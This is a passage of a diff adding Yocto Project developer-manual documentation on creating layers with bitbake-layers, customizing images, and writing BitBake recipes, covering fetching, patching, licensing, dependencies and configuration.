+ new layer.
+
+In its simplest form, you can use the following command form to create a
+layer. The command creates a layer whose name corresponds to
+"your_layer_name" in the current directory:
+::
+
+ $ bitbake-layers create-layer your_layer_name
+
+As an example, the following command creates a layer named ``meta-scottrif``
+in your home directory:
+::
+
+ $ cd /usr/home
+ $ bitbake-layers create-layer meta-scottrif
+ NOTE: Starting bitbake server...
+ Add your new layer with 'bitbake-layers add-layer meta-scottrif'
+
+If you want to set the priority of the layer to other than the default
+value of "6", you can either use the ``--priority`` option or you
+can edit the
+:term:`BBFILE_PRIORITY` value
+in the ``conf/layer.conf`` after the script creates it. Furthermore, if
+you want to give the example recipe file some name other than the
+default, you can use the ``--example-recipe-name`` option.
+
+The easiest way to see how the ``bitbake-layers create-layer`` command
+works is to experiment with the script. You can also read the usage
+information by entering the following:
+::
+
+ $ bitbake-layers create-layer --help
+ NOTE: Starting bitbake server...
+ usage: bitbake-layers create-layer [-h] [--priority PRIORITY]
+ [--example-recipe-name EXAMPLERECIPE]
+ layerdir
+
+ Create a basic layer
+
+ positional arguments:
+ layerdir Layer directory to create
+
+ optional arguments:
+ -h, --help show this help message and exit
+ --priority PRIORITY, -p PRIORITY
+ Layer directory to create
+ --example-recipe-name EXAMPLERECIPE, -e EXAMPLERECIPE
+ Filename of the example recipe
+
+Adding a Layer Using the ``bitbake-layers`` Script
+--------------------------------------------------
+
+Once you create your general layer, you must add it to your
+``bblayers.conf`` file. Adding the layer to this configuration file
+makes the OpenEmbedded build system aware of your layer so that it can
+search it for metadata.
+
+Add your layer by using the ``bitbake-layers add-layer`` command:
+::
+
+ $ bitbake-layers add-layer your_layer_name
+
+Here is an example that adds a
+layer named ``meta-scottrif`` to the configuration file. Following the
+command that adds the layer is another ``bitbake-layers`` command that
+shows the layers that are in your ``bblayers.conf`` file:
+::
+
+ $ bitbake-layers add-layer meta-scottrif
+ NOTE: Starting bitbake server...
+ Parsing recipes: 100% |##########################################################| Time: 0:00:49
+ Parsing of 1441 .bb files complete (0 cached, 1441 parsed). 2055 targets, 56 skipped, 0 masked, 0 errors.
+ $ bitbake-layers show-layers
+ NOTE: Starting bitbake server...
+ layer path priority
+ ==========================================================================
+ meta /home/scottrif/poky/meta 5
+ meta-poky /home/scottrif/poky/meta-poky 5
+ meta-yocto-bsp /home/scottrif/poky/meta-yocto-bsp 5
+ workspace /home/scottrif/poky/build/workspace 99
+ meta-scottrif /home/scottrif/poky/build/meta-scottrif 6
+
+
+Adding the layer to this file
+enables the build system to locate the layer during the build.
+
+.. note::
+
+ During a build, the OpenEmbedded build system looks in the layers
+ from the top of the list down to the bottom in that order.
+
+.. _usingpoky-extend-customimage:
+
+Customizing Images
+==================
+
+You can customize images to satisfy particular requirements. This
+section describes several methods and provides guidelines for each.
+
+.. _usingpoky-extend-customimage-localconf:
+
+Customizing Images Using ``local.conf``
+---------------------------------------
+
+Probably the easiest way to customize an image is to add a package by
+way of the ``local.conf`` configuration file. Because it is limited to
+local use, this method generally only allows you to add packages and is
+not as flexible as creating your own customized image. When you add
+packages using local variables this way, you need to realize that these
+variable changes are in effect for every build and consequently affect
+all images, which might not be what you require.
+
+To add a package to your image using the local configuration file, use
+the ``IMAGE_INSTALL`` variable with the ``_append`` operator:
+::
+
+ IMAGE_INSTALL_append = " strace"
+
+Use of the syntax is important -
+specifically, the space between the quote and the package name, which is
+``strace`` in this example. This space is required since the ``_append``
+operator does not add the space.
+
+Furthermore, you must use ``_append`` instead of the ``+=`` operator if
+you want to avoid ordering issues. The reason for this is because doing
+so unconditionally appends to the variable and avoids ordering problems
+due to the variable being set in image recipes and ``.bbclass`` files
+with operators like ``?=``. Using ``_append`` ensures the operation
+takes effect.
+
+As shown in its simplest use, ``IMAGE_INSTALL_append`` affects all
+images. It is possible to extend the syntax so that the variable applies
+to a specific image only. Here is an example:
+::
+
+ IMAGE_INSTALL_append_pn-core-image-minimal = " strace"
+
+This example adds ``strace`` to the ``core-image-minimal`` image only.
+
+You can add packages using a similar approach through the
+``CORE_IMAGE_EXTRA_INSTALL`` variable. If you use this variable, only
+``core-image-*`` images are affected.
+
+.. _usingpoky-extend-customimage-imagefeatures:
+
+Customizing Images Using Custom ``IMAGE_FEATURES`` and ``EXTRA_IMAGE_FEATURES``
+-------------------------------------------------------------------------------
+
+Another method for customizing your image is to enable or disable
+high-level image features by using the
+:term:`IMAGE_FEATURES` and
+:term:`EXTRA_IMAGE_FEATURES`
+variables. Although the functions for both variables are nearly
+equivalent, best practices dictate using ``IMAGE_FEATURES`` from within
+a recipe and using ``EXTRA_IMAGE_FEATURES`` from within your
+``local.conf`` file, which is found in the
+:term:`Build Directory`.
+
+To understand how these features work, the best reference is
+``meta/classes/core-image.bbclass``. This class lists out the available
+``IMAGE_FEATURES`` of which most map to package groups while some, such
+as ``debug-tweaks`` and ``read-only-rootfs``, resolve as general
+configuration settings.
+
+In summary, the file looks at the contents of the ``IMAGE_FEATURES``
+variable and then maps or configures the feature accordingly. Based on
+this information, the build system automatically adds the appropriate
+packages or configurations to the
+:term:`IMAGE_INSTALL` variable.
+Effectively, you are enabling extra features by extending the class or
+creating a custom class for use with specialized image ``.bb`` files.
+
+Use the ``EXTRA_IMAGE_FEATURES`` variable from within your local
+configuration file. Using a separate area from which to enable features
+with this variable helps you avoid overwriting the features in the image
+recipe that are enabled with ``IMAGE_FEATURES``. The value of
+``EXTRA_IMAGE_FEATURES`` is added to ``IMAGE_FEATURES`` within
+``meta/conf/bitbake.conf``.
+
+To illustrate how you can use these variables to modify your image,
+consider an example that selects the SSH server. The Yocto Project ships
+with two SSH servers you can use with your images: Dropbear and OpenSSH.
+Dropbear is a minimal SSH server appropriate for resource-constrained
+environments, while OpenSSH is a well-known standard SSH server
+implementation. By default, the ``core-image-sato`` image is configured
+to use Dropbear. The ``core-image-full-cmdline`` and ``core-image-lsb``
+images both include OpenSSH. The ``core-image-minimal`` image does not
+contain an SSH server.
+
+You can customize your image and change these defaults. Edit the
+``IMAGE_FEATURES`` variable in your recipe or use the
+``EXTRA_IMAGE_FEATURES`` in your ``local.conf`` file so that it
+configures the image you are working with to include
+``ssh-server-dropbear`` or ``ssh-server-openssh``.
+
+.. note::
+
+ See the ":ref:`ref-manual/ref-features:image features`" section in the Yocto
+ Project Reference Manual for a complete list of image features that ship
+ with the Yocto Project.
+
+.. _usingpoky-extend-customimage-custombb:
+
+Customizing Images Using Custom .bb Files
+-----------------------------------------
+
+You can also customize an image by creating a custom recipe that defines
+additional software as part of the image. The following example shows
+the form for the two lines you need:
+::
+
+ IMAGE_INSTALL = "packagegroup-core-x11-base package1 package2"
+ inherit core-image
+
+Defining the software using a custom recipe gives you total control over
+the contents of the image. It is important to use the correct names of
+packages in the ``IMAGE_INSTALL`` variable. You must use the
+OpenEmbedded notation and not the Debian notation for the names (e.g.
+``glibc-dev`` instead of ``libc6-dev``).
+
+The other method for creating a custom image is to base it on an
+existing image. For example, if you want to create an image based on
+``core-image-sato`` but add the additional package ``strace`` to the
+image, copy the ``meta/recipes-sato/images/core-image-sato.bb`` to a new
+``.bb`` and add the following line to the end of the copy:
+::
+
+ IMAGE_INSTALL += "strace"
+
+.. _usingpoky-extend-customimage-customtasks:
+
+Customizing Images Using Custom Package Groups
+----------------------------------------------
+
+For complex custom images, the best approach for customizing an image is
+to create a custom package group recipe that is used to build the image
+or images. A good example of a package group recipe is
+``meta/recipes-core/packagegroups/packagegroup-base.bb``.
+
+If you examine that recipe, you see that the ``PACKAGES`` variable lists
+the package group packages to produce. The ``inherit packagegroup``
+statement sets appropriate default values and automatically adds
+``-dev``, ``-dbg``, and ``-ptest`` complementary packages for each
+package specified in the ``PACKAGES`` statement.
+
+.. note::
+
+ The ``inherit packagegroup`` line should be located near the top of the
+ recipe, certainly before the ``PACKAGES`` statement.
+
+For each package you specify in ``PACKAGES``, you can use ``RDEPENDS``
+and ``RRECOMMENDS`` entries to provide a list of packages the parent
+task package should contain. You can see examples of these further down
+in the ``packagegroup-base.bb`` recipe.
+
+Here is a short, fabricated example showing the same basic pieces for a
+hypothetical packagegroup defined in ``packagegroup-custom.bb``, where
+the variable ``PN`` is the standard way to abbreviate the reference to
+the full packagegroup name ``packagegroup-custom``:
+::
+
+ DESCRIPTION = "My Custom Package Groups"
+
+ inherit packagegroup
+
+ PACKAGES = "\
+ ${PN}-apps \
+ ${PN}-tools \
+ "
+
+ RDEPENDS_${PN}-apps = "\
+ dropbear \
+ portmap \
+ psplash"
+
+ RDEPENDS_${PN}-tools = "\
+ oprofile \
+ oprofileui-server \
+ lttng-tools"
+
+ RRECOMMENDS_${PN}-tools = "\
+ kernel-module-oprofile"
+
+In the previous example, two package group packages are created with
+their dependencies and their recommended package dependencies listed:
+``packagegroup-custom-apps``, and ``packagegroup-custom-tools``. To
+build an image using these package group packages, you need to add
+``packagegroup-custom-apps`` and/or ``packagegroup-custom-tools`` to
+``IMAGE_INSTALL``. For other forms of image dependencies see the other
+areas of this section.
+
+.. _usingpoky-extend-customimage-image-name:
+
+Customizing an Image Hostname
+-----------------------------
+
+By default, the configured hostname (i.e. ``/etc/hostname``) in an image
+is the same as the machine name. For example, if
+:term:`MACHINE` equals "qemux86", the
+configured hostname written to ``/etc/hostname`` is "qemux86".
+
+You can customize this name by altering the value of the "hostname"
+variable in the ``base-files`` recipe using either an append file or a
+configuration file. Use the following in an append file:
+::
+
+ hostname = "myhostname"
+
+Use the following in a configuration file:
+::
+
+ hostname_pn-base-files = "myhostname"
+
+Changing the default value of the variable "hostname" can be useful in
+certain situations. For example, suppose you need to do extensive
+testing on an image and you would like to easily identify the image
+under test from existing images with typical default hostnames. In this
+situation, you could change the default hostname to "testme", which
+results in all the images using the name "testme". Once testing is
+complete and you do not need to rebuild the image for test any longer,
+you can easily reset the default hostname.
+
+Another point of interest is that if you unset the variable, the image
+will have no default hostname in the filesystem. Here is an example that
+unsets the variable in a configuration file:
+::
+
+ hostname_pn-base-files = ""
+
+Having no default hostname in the filesystem is suitable for
+environments that use dynamic hostnames such as virtual machines.
+
+.. _new-recipe-writing-a-new-recipe:
+
+Writing a New Recipe
+====================
+
+Recipes (``.bb`` files) are fundamental components in the Yocto Project
+environment. Each software component built by the OpenEmbedded build
+system requires a recipe to define the component. This section describes
+how to create, write, and test a new recipe.
+
+.. note::
+
+ For information on variables that are useful for recipes and for
+ information about recipe naming issues, see the
+ ":ref:`ref-manual/ref-varlocality:recipes`" section of the Yocto Project
+ Reference Manual.
+
+.. _new-recipe-overview:
+
+Overview
+--------
+
+The following figure shows the basic process for creating a new recipe.
+The remainder of the section provides details for the steps.
+
+.. image:: figures/recipe-workflow.png
+ :align: center
+
+.. _new-recipe-locate-or-automatically-create-a-base-recipe:
+
+Locate or Automatically Create a Base Recipe
+--------------------------------------------
+
+You can always write a recipe from scratch. However, three choices exist
+that can help you quickly get a start on a new recipe:
+
+- ``devtool add``: A command that assists in creating a recipe and an
+ environment conducive to development.
+
+- ``recipetool create``: A command provided by the Yocto Project that
+ automates creation of a base recipe based on the source files.
+
+- *Existing Recipes:* Location and modification of an existing recipe
+ that is similar in function to the recipe you need.
+
+.. note::
+
+ For information on recipe syntax, see the
+ ":ref:`dev-manual/dev-manual-common-tasks:recipe syntax`" section.
+
+.. _new-recipe-creating-the-base-recipe-using-devtool:
+
+Creating the Base Recipe Using ``devtool add``
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+The ``devtool add`` command uses the same logic for auto-creating the
+recipe as ``recipetool create``, which is listed below. Additionally,
+however, ``devtool add`` sets up an environment that makes it easy for
+you to patch the source and to make changes to the recipe as is often
+necessary when adding a recipe to build a new piece of software to be
+included in a build.
+
+You can find a complete description of the ``devtool add`` command in
+the ":ref:`sdk-a-closer-look-at-devtool-add`" section
+in the Yocto Project Application Development and the Extensible Software
+Development Kit (eSDK) manual.
+
+.. _new-recipe-creating-the-base-recipe-using-recipetool:
+
+Creating the Base Recipe Using ``recipetool create``
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+``recipetool create`` automates creation of a base recipe given a set of
+source code files. As long as you can extract or point to the source
+files, the tool will construct a recipe and automatically configure all
+pre-build information into the recipe. For example, suppose you have an
+application that builds using Autotools. Creating the base recipe using
+``recipetool`` results in a recipe that has the pre-build dependencies,
+license requirements, and checksums configured.
+
+To run the tool, you just need to be in your
+:term:`Build Directory` and have sourced the
+build environment setup script (i.e.
+:ref:`structure-core-script`).
+To get help on the tool, use the following command:
+::
+
+ $ recipetool -h
+ NOTE: Starting bitbake server...
+ usage: recipetool [-d] [-q] [--color COLOR] [-h] <subcommand> ...
+
+ OpenEmbedded recipe tool
+
+ options:
+ -d, --debug Enable debug output
+ -q, --quiet Print only errors
+ --color COLOR Colorize output (where COLOR is auto, always, never)
+ -h, --help show this help message and exit
+
+ subcommands:
+ create Create a new recipe
+ newappend Create a bbappend for the specified target in the specified
+ layer
+ setvar Set a variable within a recipe
+ appendfile Create/update a bbappend to replace a target file
+ appendsrcfiles Create/update a bbappend to add or replace source files
+ appendsrcfile Create/update a bbappend to add or replace a source file
+ Use recipetool <subcommand> --help to get help on a specific command
+
+Running ``recipetool create -o OUTFILE`` creates the base recipe and
+locates it properly in the layer that contains your source files.
+Following are some syntax examples:
+
+ - Use this syntax to generate a recipe based on source. Once generated,
+ the recipe resides in the existing source code layer:
+ ::
+
+ recipetool create -o OUTFILE source
+
+ - Use this syntax to generate a recipe using code that
+ you extract from source. The extracted code is placed in its own layer
+ defined by ``EXTERNALSRC``.
+ ::
+
+ recipetool create -o OUTFILE -x EXTERNALSRC source
+
+ - Use this syntax to generate a recipe based on source. The options
+ direct ``recipetool`` to generate debugging information. Once generated,
+ the recipe resides in the existing source code layer:
+ ::
+
+ recipetool create -d -o OUTFILE source
+
+.. _new-recipe-locating-and-using-a-similar-recipe:
+
+Locating and Using a Similar Recipe
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Before writing a recipe from scratch, it is often useful to discover
+whether someone else has already written one that meets (or comes close
+to meeting) your needs. The Yocto Project and OpenEmbedded communities
+maintain many recipes that might be candidates for what you are doing.
+You can find a good central index of these recipes in the `OpenEmbedded
+Layer Index <https://layers.openembedded.org>`__.
+
+Working from an existing recipe or a skeleton recipe is the best way to
+get started. Here are some points on both methods:
+
+- *Locate and modify a recipe that is close to what you want to do:*
+ This method works when you are familiar with the current recipe
+ space. The method does not work so well for those new to the Yocto
+ Project or writing recipes.
+
+ Some risks associated with this method are using a recipe that has
+ areas totally unrelated to what you are trying to accomplish with
+ your recipe, not recognizing areas of the recipe that you might have
+ to add from scratch, and so forth. All these risks stem from
+ unfamiliarity with the existing recipe space.
+
+- *Use and modify the following skeleton recipe:* If for some reason
+ you do not want to use ``recipetool`` and you cannot find an existing
+ recipe that is close to meeting your needs, you can use the following
+ structure to provide the fundamental areas of a new recipe.
+ ::
+
+ DESCRIPTION = ""
+ HOMEPAGE = ""
+ LICENSE = ""
+ SECTION = ""
+ DEPENDS = ""
+ LIC_FILES_CHKSUM = ""
+
+ SRC_URI = ""
+
+.. _new-recipe-storing-and-naming-the-recipe:
+
+Storing and Naming the Recipe
+-----------------------------
+
+Once you have your base recipe, you should put it in your own layer and
+name it appropriately. Locating it correctly ensures that the
+OpenEmbedded build system can find it when you use BitBake to process
+the recipe.
+
+- *Storing Your Recipe:* The OpenEmbedded build system locates your
+ recipe through the layer's ``conf/layer.conf`` file and the
+ :term:`BBFILES` variable. This
+ variable sets up a path from which the build system can locate
+ recipes. Here is the typical use:
+ ::
+
+ BBFILES += "${LAYERDIR}/recipes-*/*/*.bb \
+ ${LAYERDIR}/recipes-*/*/*.bbappend"
+
+ Consequently, you need to be sure you locate your new recipe inside
+ your layer such that it can be found.
+
+ You can find more information on how layers are structured in the
+ "`Understanding and Creating
+ Layers <#understanding-and-creating-layers>`__" section.
+
+- *Naming Your Recipe:* When you name your recipe, you need to follow
+ this naming convention:
+ ::
+
+ basename_version.bb
+
+ Use lower-cased characters and do not include the reserved suffixes
+ ``-native``, ``-cross``, ``-initial``, or ``-dev`` casually (i.e. do not use
+ them as part of your recipe name unless the string applies). Here are some
+ examples:
+
+ .. code-block:: none
+
+ cups_1.7.0.bb
+ gawk_4.0.2.bb
+ irssi_0.8.16-rc1.bb
+
+.. _new-recipe-running-a-build-on-the-recipe:
+
+Running a Build on the Recipe
+-----------------------------
+
+Creating a new recipe is usually an iterative process that requires
+using BitBake to process the recipe multiple times in order to
+progressively discover and add information to the recipe file.
+
+Assuming you have sourced the build environment setup script (i.e.
+:ref:`structure-core-script`) and you are in
+the :term:`Build Directory`, use
+BitBake to process your recipe. All you need to provide is the
+``basename`` of the recipe as described in the previous section:
+::
+
+ $ bitbake basename
+
+During the build, the OpenEmbedded build system creates a temporary work
+directory for each recipe
+(``${``\ :term:`WORKDIR`\ ``}``)
+where it keeps extracted source files, log files, intermediate
+compilation and packaging files, and so forth.
+
+The path to the per-recipe temporary work directory depends on the
+context in which it is being built. The quickest way to find this path
+is to have BitBake return it by running the following:
+::
+
+ $ bitbake -e basename | grep ^WORKDIR=
+
+As an example, assume a Source Directory
+top-level folder named ``poky``, a default Build Directory at
+``poky/build``, and a ``qemux86-poky-linux`` machine target system.
+Furthermore, suppose your recipe is named ``foo_1.3.0.bb``. In this
+case, the work directory the build system uses to build the package
+would be as follows:
+::
+
+ poky/build/tmp/work/qemux86-poky-linux/foo/1.3.0-r0
+
+Inside this directory you can find sub-directories such as ``image``,
+``packages-split``, and ``temp``. After the build, you can examine these
+to determine how well the build went.
+
+.. note::
+
+ You can find log files for each task in the recipe's ``temp``
+ directory (e.g. ``poky/build/tmp/work/qemux86-poky-linux/foo/1.3.0-r0/temp``).
+ Log files are named ``log.taskname`` (e.g. ``log.do_configure``,
+ ``log.do_fetch``, and ``log.do_compile``).
+
+You can find more information about the build process in
+":doc:`../overview-manual/overview-manual-development-environment`"
+chapter of the Yocto Project Overview and Concepts Manual.
+
+.. _new-recipe-fetching-code:
+
+Fetching Code
+-------------
+
+The first thing your recipe must do is specify how to fetch the source
+files. Fetching is controlled mainly through the
+:term:`SRC_URI` variable. Your recipe
+must have a ``SRC_URI`` variable that points to where the source is
+located. For a graphical representation of source locations, see the
+":ref:`sources-dev-environment`" section in
+the Yocto Project Overview and Concepts Manual.
+
+The :ref:`ref-tasks-fetch` task uses
+the prefix of each entry in the ``SRC_URI`` variable value to determine
+which :ref:`fetcher <bitbake:bb-fetchers>` to use to get your
+source files. It is the ``SRC_URI`` variable that triggers the fetcher.
+The :ref:`ref-tasks-patch` task uses
+the variable after source is fetched to apply patches. The OpenEmbedded
+build system uses
+:term:`FILESOVERRIDES` for
+scanning directory locations for local files in ``SRC_URI``.
+
+The ``SRC_URI`` variable in your recipe must define each unique location
+for your source files. It is good practice to not hard-code version
+numbers in a URL used in ``SRC_URI``. Rather than hard-code these
+values, use ``${``\ :term:`PV`\ ``}``,
+which causes the fetch process to use the version specified in the
+recipe filename. Specifying the version in this manner means that
+upgrading the recipe to a future version is as simple as renaming the
+recipe to match the new version.
+
+Here is a simple example from the
+``meta/recipes-devtools/strace/strace_5.5.bb`` recipe where the source
+comes from a single tarball. Notice the use of the
+:term:`PV` variable:
+::
+
+ SRC_URI = "https://strace.io/files/${PV}/strace-${PV}.tar.xz \
+
+Files mentioned in ``SRC_URI`` whose names end in a typical archive
+extension (e.g. ``.tar``, ``.tar.gz``, ``.tar.bz2``, ``.zip``, and so
+forth), are automatically extracted during the
+:ref:`ref-tasks-unpack` task. For
+another example that specifies these types of files, see the
+"`Autotooled Package <#new-recipe-autotooled-package>`__" section.
+
+Another way of specifying source is from an SCM. For Git repositories,
+you must specify :term:`SRCREV` and
+you should specify :term:`PV` to include
+the revision with :term:`SRCPV`. Here
+is an example from the recipe
+``meta/recipes-kernel/blktrace/blktrace_git.bb``:
+::
+
+ SRCREV = "d6918c8832793b4205ed3bfede78c2f915c23385"
+
+ PR = "r6"
+ PV = "1.0.5+git${SRCPV}"
+
+ SRC_URI = "git://git.kernel.dk/blktrace.git \
+ file://ldflags.patch"
+
+If your ``SRC_URI`` statement includes URLs pointing to individual files
+fetched from a remote server other than a version control system,
+BitBake attempts to verify the files against checksums defined in your
+recipe to ensure they have not been tampered with or otherwise modified
+since the recipe was written. Two checksums are used:
+``SRC_URI[md5sum]`` and ``SRC_URI[sha256sum]``.
+
+If your ``SRC_URI`` variable points to more than a single URL (excluding
+SCM URLs), you need to provide the ``md5`` and ``sha256`` checksums for
+each URL. For these cases, you provide a name for each URL as part of
+the ``SRC_URI`` and then reference that name in the subsequent checksum
+statements. Here is an example combining lines from the files
+``git.inc`` and ``git_2.24.1.bb``:
+::
+
+ SRC_URI = "${KERNELORG_MIRROR}/software/scm/git/git-${PV}.tar.gz;name=tarball \
+ ${KERNELORG_MIRROR}/software/scm/git/git-manpages-${PV}.tar.gz;name=manpages"
+
+ SRC_URI[tarball.md5sum] = "166bde96adbbc11c8843d4f8f4f9811b"
+ SRC_URI[tarball.sha256sum] = "ad5334956301c86841eb1e5b1bb20884a6bad89a10a6762c958220c7cf64da02"
+ SRC_URI[manpages.md5sum] = "31c2272a8979022497ba3d4202df145d"
+ SRC_URI[manpages.sha256sum] = "9a7ae3a093bea39770eb96ca3e5b40bff7af0b9f6123f089d7821d0e5b8e1230"
+
+Proper values for ``md5`` and ``sha256`` checksums might be available
+with other signatures on the download page for the upstream source (e.g.
+``md5``, ``sha1``, ``sha256``, ``GPG``, and so forth). Because the
+OpenEmbedded build system only deals with ``sha256sum`` and ``md5sum``,
+you should verify all the signatures you find by hand.
+
+If no ``SRC_URI`` checksums are specified when you attempt to build the
+recipe, or you provide an incorrect checksum, the build will produce an
+error for each missing or incorrect checksum. As part of the error
+message, the build system provides the checksum string corresponding to
+the fetched file. Once you have the correct checksums, you can copy and
+paste them into your recipe and then run the build again to continue.
+
+.. note::
+
+ As mentioned, if the upstream source provides signatures for
+ verifying the downloaded source code, you should verify those
+ manually before setting the checksum values in the recipe and
+ continuing with the build.
+
+This final example is a bit more complicated and is from the
+``meta/recipes-sato/rxvt-unicode/rxvt-unicode_9.20.bb`` recipe. The
+example's ``SRC_URI`` statement identifies multiple files as the source
+files for the recipe: a tarball, a patch file, a desktop file, and an
+icon.
+::
+
+ SRC_URI = "http://dist.schmorp.de/rxvt-unicode/Attic/rxvt-unicode-${PV}.tar.bz2 \
+ file://xwc.patch \
+ file://rxvt.desktop \
+ file://rxvt.png"
+
+When you specify local files using the ``file://`` URI protocol, the
+build system fetches files from the local machine. The path is relative
+to the :term:`FILESPATH` variable
+and searches specific directories in a certain order:
+``${``\ :term:`BP`\ ``}``,
+``${``\ :term:`BPN`\ ``}``, and
+``files``. The directories are assumed to be subdirectories of the
+directory in which the recipe or append file resides. For another
+example that specifies these types of files, see the "`Single .c File
+Package (Hello
+World!) <#new-recipe-single-c-file-package-hello-world>`__" section.
+
+The previous example also specifies a patch file. Patch files are files
+whose names usually end in ``.patch`` or ``.diff`` but can end with
+compressed suffixes such as ``diff.gz`` and ``patch.bz2``, for example.
+The build system automatically applies patches as described in the
+"`Patching Code <#new-recipe-patching-code>`__" section.
+
+.. _new-recipe-unpacking-code:
+
+Unpacking Code
+--------------
+
+During the build, the
+:ref:`ref-tasks-unpack` task unpacks
+the source with ``${``\ :term:`S`\ ``}``
+pointing to where it is unpacked.
+
+If you are fetching your source files from an upstream source archived
+tarball and the tarball's internal structure matches the common
+convention of a top-level subdirectory named
+``${``\ :term:`BPN`\ ``}-${``\ :term:`PV`\ ``}``,
+then you do not need to set ``S``. However, if ``SRC_URI`` specifies to
+fetch source from an archive that does not use this convention, or from
+an SCM like Git or Subversion, your recipe needs to define ``S``.
+
+If processing your recipe using BitBake successfully unpacks the source
+files, you need to be sure that the directory pointed to by ``${S}``
+matches the structure of the source.
+
+.. _new-recipe-patching-code:
+
+Patching Code
+-------------
+
+Sometimes it is necessary to patch code after it has been fetched. Any
+files mentioned in ``SRC_URI`` whose names end in ``.patch`` or
+``.diff`` or compressed versions of these suffixes (e.g. ``diff.gz`` are
+treated as patches. The
+:ref:`ref-tasks-patch` task
+automatically applies these patches.
+
+The build system should be able to apply patches with the "-p1" option
+(i.e. one directory level in the path will be stripped off). If your
+patch needs to have more directory levels stripped off, specify the
+number of levels using the "striplevel" option in the ``SRC_URI`` entry
+for the patch. Alternatively, if your patch needs to be applied in a
+specific subdirectory that is not specified in the patch file, use the
+"patchdir" option in the entry.
+
+As with all local files referenced in
+:term:`SRC_URI` using ``file://``,
+you should place patch files in a directory next to the recipe either
+named the same as the base name of the recipe
+(:term:`BP` and
+:term:`BPN`) or "files".
+
+.. _new-recipe-licensing:
+
+Licensing
+---------
+
+Your recipe needs to have both the
+:term:`LICENSE` and
+:term:`LIC_FILES_CHKSUM`
+variables:
+
+- ``LICENSE``: This variable specifies the license for the software.
+ If you do not know the license under which the software you are
+ building is distributed, you should go to the source code and look
+ for that information. Typical files containing this information
+ include ``COPYING``, ``LICENSE``, and ``README`` files. You could
+ also find the information near the top of a source file. For example,
+ given a piece of software licensed under the GNU General Public
+ License version 2, you would set ``LICENSE`` as follows:
+ ::
+
+ LICENSE = "GPLv2"
+
+ The licenses you specify within ``LICENSE`` can have any name as long
+ as you do not use spaces, since spaces are used as separators between
+ license names. For standard licenses, use the names of the files in
+ ``meta/files/common-licenses/`` or the ``SPDXLICENSEMAP`` flag names
+ defined in ``meta/conf/licenses.conf``.
+
+- ``LIC_FILES_CHKSUM``: The OpenEmbedded build system uses this
+ variable to make sure the license text has not changed. If it has,
+ the build produces an error and it affords you the chance to figure
+ it out and correct the problem.
+
+ You need to specify all applicable licensing files for the software.
+ At the end of the configuration step, the build process will compare
+ the checksums of the files to be sure the text has not changed. Any
+ differences result in an error with the message containing the
+ current checksum. For more explanation and examples of how to set the
+ ``LIC_FILES_CHKSUM`` variable, see the
+ ":ref:`dev-manual/dev-manual-common-tasks:tracking license changes`" section.
+
+ To determine the correct checksum string, you can list the
+ appropriate files in the ``LIC_FILES_CHKSUM`` variable with incorrect
+ md5 strings, attempt to build the software, and then note the
+ resulting error messages that will report the correct md5 strings.
+ See the "`Fetching Code <#new-recipe-fetching-code>`__" section for
+ additional information.
+
+ Here is an example that assumes the software has a ``COPYING`` file:
+ ::
+
+ LIC_FILES_CHKSUM = "file://COPYING;md5=xxx"
+
+ When you try to build the
+ software, the build system will produce an error and give you the
+ correct string that you can substitute into the recipe file for a
+ subsequent build.
+
+.. _new-dependencies:
+
+Dependencies
+------------
+
+Most software packages have a short list of other packages that they
+require, which are called dependencies. These dependencies fall into two
+main categories: build-time dependencies, which are required when the
+software is built; and runtime dependencies, which are required to be
+installed on the target in order for the software to run.
+
+Within a recipe, you specify build-time dependencies using the
+:term:`DEPENDS` variable. Although
+nuances exist, items specified in ``DEPENDS`` should be names of other
+recipes. It is important that you specify all build-time dependencies
+explicitly.
+
+Another consideration is that configure scripts might automatically
+check for optional dependencies and enable corresponding functionality
+if those dependencies are found. If you wish to make a recipe that is
+more generally useful (e.g. publish the recipe in a layer for others to
+use), instead of hard-disabling the functionality, you can use the
+:term:`PACKAGECONFIG` variable to allow functionality and the
+corresponding dependencies to be enabled and disabled easily by other
+users of the recipe.
+
+Similar to build-time dependencies, you specify runtime dependencies
+through a variable -
+:term:`RDEPENDS`, which is
+package-specific. All variables that are package-specific need to have
+the name of the package added to the end as an override. Since the main
+package for a recipe has the same name as the recipe, and the recipe's
+name can be found through the
+``${``\ :term:`PN`\ ``}`` variable, then
+you specify the dependencies for the main package by setting
+``RDEPENDS_${PN}``. If the package were named ``${PN}-tools``, then you
+would set ``RDEPENDS_${PN}-tools``, and so forth.
+
+Some runtime dependencies will be set automatically at packaging time.
+These dependencies include any shared library dependencies (i.e. if a
+package "example" contains "libexample" and another package "mypackage"
+contains a binary that links to "libexample" then the OpenEmbedded build
+system will automatically add a runtime dependency to "mypackage" on
+"example"). See the
+":ref:`overview-manual/overview-manual-concepts:automatically added runtime dependencies`"
+section in the Yocto Project Overview and Concepts Manual for further
+details.
+
+.. _new-recipe-configuring-the-recipe:
+
+Configuring the Recipe
+----------------------
+
+Most software provides some means of setting build-time configuration
+options before compilation. Typically, setting these options is
+accomplished by running a configure script with options, or by modifying
+a build configuration file.
+
+.. note::
+
+ As of Yocto Project Release 1.7, some of the core recipes that
+ package binary configuration scripts now disable the scripts due to
+ the scripts previously requiring error-prone path substitution. The
+ OpenEmbedded build system uses ``pkg-config`` now, which is much more
+ robust. You can find a list of the ``*-config`` scripts that are disabled
+ in the ":ref:`migration-1.7-binary-configuration-scripts-disabled`" section
+ in the Yocto Project Reference Manual.
+
+A major part of build-time configuration is about checking for
+build-time dependencies and possibly enabling optional functionality as
+a result. You need to specify any build-time dependencies for the
+software you are building in your recipe's
+:term:`DEPENDS` value, in terms of
+other recipes that satisfy those dependencies. You can often find
+build-time or runtime dependencies described in the software's
+documentation.
+
+The following list provides configuration items of note based on how
+your software is built:
+
+- *Autotools:* If your source files have a ``configure.ac`` file, then
+ your software is built using Autotools. If this is the case, you just
+ need to worry about modifying the configuration.
+
+ When using Autotools, your recipe needs to inherit the
+ :ref:`autotools <ref-classes-autotools>` class
+ and your recipe does not have to contain a
+ :ref:`ref-tasks-configure` task.
+ However, you might still want to make some adjustments. For example,
+ you can set
+ :term:`EXTRA_OECONF` or
+ :term:`PACKAGECONFIG_CONFARGS`
+ to pass any needed configure options that are specific to the recipe.
+
+- *CMake:* If your source files have a ``CMakeLists.txt`` file, then
+ your software is built using CMake. If this is the case, you just
+ need to worry about modifying the configuration.
+
+ When you use CMake, your recipe needs to inherit the
